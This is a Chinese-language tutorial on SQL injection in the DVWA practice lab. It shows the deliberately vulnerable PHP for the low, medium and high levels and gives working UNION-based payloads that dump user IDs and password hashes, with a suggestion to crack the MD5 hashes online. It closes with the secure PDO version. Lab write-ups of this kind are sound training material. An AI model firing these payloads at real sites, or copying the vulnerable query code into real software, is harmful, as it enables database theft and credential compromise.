DVWA漏洞测试之SQL注入

我们已经在前面讨论过sql注入漏洞产生的原因和一些绕过waf的技巧。今天话不多说直接上测试：

首先我们先理清手工注入思路：
1.判断是否存在注入，注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据

LOW级别

必须的第一步，看源码：

<?php 

if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

    mysqli_close($GLOBALS["___mysqli_ston"]); 
} 

?>

分析源码我们可以发现，这是最不安全的代码，因为代码并未对参数id进行任何的检查过滤。
那么下面我们按照步骤进行“脱裤”：

1.判断是否能注入和注入类型

首先输入1查询成功

输入 1‘ and ‘1’=’2 查询失败

输入1‘ or ‘1234’=’1234 查询成功

说明存在字符型注入漏洞

2.猜解SQL查询语句中的字段数

输入1’order by 1#
意思是按select语句第一个字段进行排序（升序）

输入1’order by 2#

输入1’order by 3#

说明sql查询语句中只有两个字段，即First name 和 Surname。

3.确定显示的字段顺序

输入1‘ union select 1，2#

说明先显示的是First name 后是Surname。

4.获取当前数据库

输入1’ union select 1，database（）

5.获取数据库中的表

输入1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

6.获取表中的字段名

7.下载数据

输入

1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#

获得加密后的密码，怎么办？解密就行了，找个在线MD5
解密网站即可。

中级

话不多说，看源码：

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

} 

// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?>

分析代码可知中级代码使用了mysqli_real_escape_string对特殊字符进行转义诸如\x00,\n,\r,,’,”,\x1a，且前端页面采用了下拉菜单，希望来限制用户单输入。但我们知道仅靠前端验证是十分不安全的，我们可以通过抓包然后修改数据，完成绕过。

1.漏洞类型判断
输入1 and 1=2

发现报错

输入1 and 1=1

成功，说明存在数字型注入漏洞。
由于接下来注入过程和上面字符型类似，所以直接上脱裤结果吧。
下载数据
输入1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#

另外需要注意的时查询字段名时，因为 ’被转义成\’，所以需要用16进制绕过。

高级

看源码

<?php 

if( isset( $_SESSION [ 'id' ] ) ) { 
    // Get input 
    $id = $_SESSION[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);         
} 

高级代码采用了LIMIT 1希望以此来控制单输出，并且查询提交页面和查询结果页面不是同一个，这样就限制了sqlmap神器的一般注入，因为sqlmap无法从查询页面获取查询结果，也就无法就行下一步的注入。

利用
对于LIMIT 1我们可以采用注释的策略，前面我的代码后面都有一个#，其实对于前面没什么用处，注释符号是用来绕过现在这种情况的，同样的只进行最后的下载数据。
输入1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#

安全代码

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $id = $_GET[ 'id' ]; 

    // Was a number entered? 
    if(is_numeric( $id )) { 
        // Check the database 
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
        $data->bindParam( ':id', $id, PDO::PARAM_INT ); 
        $data->execute(); 
        $row = $data->fetch(); 

        // Make sure only 1 result is returned 
        if( $data->rowCount() == 1 ) { 
            // Get values 
            $first = $row[ 'first_name' ]; 
            $last  = $row[ 'last_name' ]; 

            // Feedback for end user 
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
        } 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

安全代码采用了严格的输出限制，只有当输出结果为一个时，才允许输出，并且采用了当前流行的防sql注入技术PDO技术，实现数据和代码分离，这也是我们常常强调的安全策略，同样采用token验证机制，我们在前面讨论过这个，有效防止了csrf攻击。分析到此结束，大家晚安！